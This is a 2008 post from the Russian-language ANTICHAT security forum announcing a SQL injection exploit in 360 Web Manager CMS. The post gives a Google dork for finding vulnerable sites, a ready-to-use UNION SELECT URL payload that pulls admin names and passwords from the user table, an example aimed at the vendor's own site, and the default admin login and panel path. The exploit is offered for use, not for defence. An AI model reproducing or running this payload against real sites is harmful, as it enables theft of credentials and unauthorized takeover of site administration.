ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
360 Web Manager CMS Remote SQL Injection Vulnerability |
20.01.2008, 08:48
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
360 Web Manager CMS Remote SQL Injection Vulnerability
360 Web Manager CMS Remote SQL Injection Vulnerability
Author: Ded MustD!e
Site: http://www.360webmanager.com/
Google Dork: inurl:"IDFM=" "form.php"
Exploit: http://site.com/form.php?IDM=7&IDSM=20&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/*
Example: http://www.360webmanager.com/form.php?IDM=2&IDSM=24&IDFM=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+u ser/*  =)))
Details: количество колонок может варьироваться, логин админа всегда "superadmin", админка - http://www.site.com/adm/login.php
Добавил на milw0rm: http://www.milw0rm.com/exploits/4944
Последний раз редактировалось Ded MustD!e; 21.01.2008 в 08:16..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид